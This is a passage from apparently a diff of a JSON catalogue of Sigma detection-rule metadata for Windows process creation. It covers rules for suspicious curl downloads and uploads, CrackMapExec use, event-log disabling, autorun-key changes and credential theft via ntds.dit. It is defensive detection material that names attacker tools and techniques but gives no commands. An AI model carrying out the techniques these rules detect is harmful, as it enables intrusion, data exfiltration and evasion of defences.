"During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "uuid": 
"c7942406-33dd-4377-a564-0f62db0593a3", - "value": "Suspicious Code Page Switch", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", - "https://twitter.com/cglyer/status/1183756892952248325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" - ], - "tags": [ - "attack.t1036", - "attack.defense_evasion" - ], - "creation_date": "2019/10/14", - "filename": "proc_creation_win_susp_codepage_switch.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative activity (adjust code pages according to your organisation's region)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", - "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", - "value": "Suspicious Characters in CommandLine", - "meta": { - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/27", - "filename": "proc_creation_win_susp_commandline_chars.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", - "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", - "value": "Suspicious RunAs-Like Flag Combination", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" - ], - "tags": "No established tags", - "creation_date": "2022/11/11", - "filename": "proc_creation_win_susp_command_flag_pattern.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line arguments of common data compression tools", - "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "value": "Suspicious Compression Tool Parameters", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1184067445612535811", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2019/10/15", - "filename": "proc_creation_win_susp_compression_params.yml", - "author": "Florian Roth, Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", - "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", - "value": "Conhost Parent Process Executions", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/25", - "filename": "proc_creation_win_susp_conhost.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", - "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", - "value": "Suspicious Conhost Legacy Option", - "meta": { - "refs": [ - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/04/04", - "filename": "proc_creation_win_susp_conhost_option.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", - "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", - "value": "CVE-2021-40444 Process Pattern", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", - "https://twitter.com/neonprimetime/status/1435584010202255375", - "https://www.joesandbox.com/analysis/476188/1/iochtml", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/09/08", - "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", - "author": "@neonprimetime, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "value": "Suspicious Control Panel DLL Load", - "meta": { - "refs": [ - "https://twitter.com/rikvduijn/status/853251879320662017", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2017/04/15", - "filename": "proc_creation_win_susp_control_dll_load.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "value": "Copy from Admin Share", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.collection", 
- "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" - ], - "creation_date": "2019/12/30", - "filename": "proc_creation_win_susp_copy_lateral_movement.yml", - "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", - "value": "Suspicious Copy From or To System32", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_copy_system32.yml", - "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command lines used in Covenant luanchers", - "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "value": "Covenant Launcher Indicators", - "meta": { - "refs": [ - "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" - ], - "creation_date": "2020/06/04", - "filename": "proc_creation_win_susp_covenant.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect various execution methods of the CrackMapExec pentesting framework", - "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", - "value": "CrackMapExec Command Execution", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" - ], - "creation_date": "2020/05/22", - "filename": "proc_creation_win_susp_crackmapexec_execution.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "value": "CrackMapExec Command Line Flags", - "meta": { - "refs": [ - 
"https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_susp_crackmapexec_flags.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "value": "CrackMapExec PowerShell Obfuscation", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" - ], - "creation_date": "2020/05/22", - "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "value": "Suspicious Parent of Csc.exe", - "meta": { - "refs": [ - 
"https://twitter.com/SBousseaden/status/1094924091256176641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" - ], - "creation_date": "2019/02/11", - "filename": "proc_creation_win_susp_csc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse Visual Basic (VB) for execution", - "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", - "value": "Cscript Visual Basic Script Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2022/01/02", - "filename": "proc_creation_win_susp_cscript_vbs.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", - "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", - "value": "Suspicious Csc.exe Source File Folder", - "meta": { - "refs": [ - "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", - "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], - "creation_date": "2019/08/24", - "filename": "proc_creation_win_susp_csc_folder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", - "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", - "value": "CsExec Remote Execution Tool Usage", - "meta": { - "refs": [ - "https://github.com/malcomvetter/CSExec", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_susp_csexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", - "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "value": "Suspicious Csi.exe Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_susp_csi.yml", - "author": "Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate usage by software developers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "value": "Suspicious Curl Usage on Windows", - "meta": { - "refs": [ - "https://twitter.com/max_mal_/status/1542461200797163522", - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_curl_download.yml", - "author": "Florian Roth, Nasreddine Bencherchali (updated)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", - "value": "Suspicious Curl File Upload", - "meta": { - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_curl_fileupload.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "value": "Curl Start Combination", - "meta": { - "refs": [ - "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/01/13", - "filename": "proc_creation_win_susp_curl_start_combo.yml", - "author": "Sreeman, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative scripts (installers)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start on Windows with set useragent options", - "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "value": "Suspicious Curl Change User Agents", - "meta": { - "refs": [ - "https://curl.se/docs/manpage.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/01/23", - "filename": "proc_creation_win_susp_curl_useragent.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "uuid": "6345b048-8441-43a7-9bed-541133633d7a", - "value": "ZOHO Dctask64 Process Injection", - "meta": { - "refs": [ - 
"https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2020/01/28", - "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown yet" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line to remove and 'exe' or 'dll'", - "uuid": "204b17ae-4007-471b-917b-b917b315c5db", - "value": "Suspicious Del in CommandLine", - "meta": { - "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2021/12/02", - "filename": "proc_creation_win_susp_del.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "value": "Suspicious Desktopimgdownldr Command", - "meta": { - "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - 
"creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_desktopimgdownldr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "uuid": "90d50722-0483-4065-8e35-57efaadd354d", - "value": "DevInit Lolbin Download", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1460815932402679809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_devinit_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Devtoolslauncher.exe executes other binary", - "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "value": "Devtoolslauncher.exe Executes Specified Binary", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", - "https://twitter.com/_felamos/status/1179811992841797632", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/10/12", - "filename": "proc_creation_win_susp_devtoolslauncher.yml", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", - "level": "high", - "falsepositive": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", - "value": "Suspicious DIR Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_dir.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", - "value": "Direct Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command that is used to disable or delete Windows 
eventlog via logman Windows utility", - "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "value": "Disable or Delete Windows Eventlog", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1359039665232306183?s=21", - "https://ss64.com/nt/logman.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" - ], - "creation_date": "2021/02/11", - "filename": "proc_creation_win_susp_disable_eventlog.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "value": "Disabled IE Security Features", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/06/19", - "filename": "proc_creation_win_susp_disable_ie_features.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown, maybe some security software installer disables these features temporarily" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", - "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "value": "Raccine Uninstall", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/01/21", - "filename": "proc_creation_win_susp_disable_raccine.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate deinstallation by administrative staff" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe", - "meta": { - "refs": [ - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_diskshadow.yml", - "author": "Ivan Dyachkov, oscd.community", - "level": "high", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Ditsnap tool. 
Seems to be a tool for ransomware groups.", - "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", - "value": "DIT Snapshot Viewer Use", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/yosqueoy/ditsnap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2020/07/04", - "filename": "proc_creation_win_susp_ditsnap.yml", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "level": "high", - "falsepositive": [ - "Legitimate admin usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", - "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "value": "Dllhost Process With No CommandLine", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2022/06/27", - "filename": 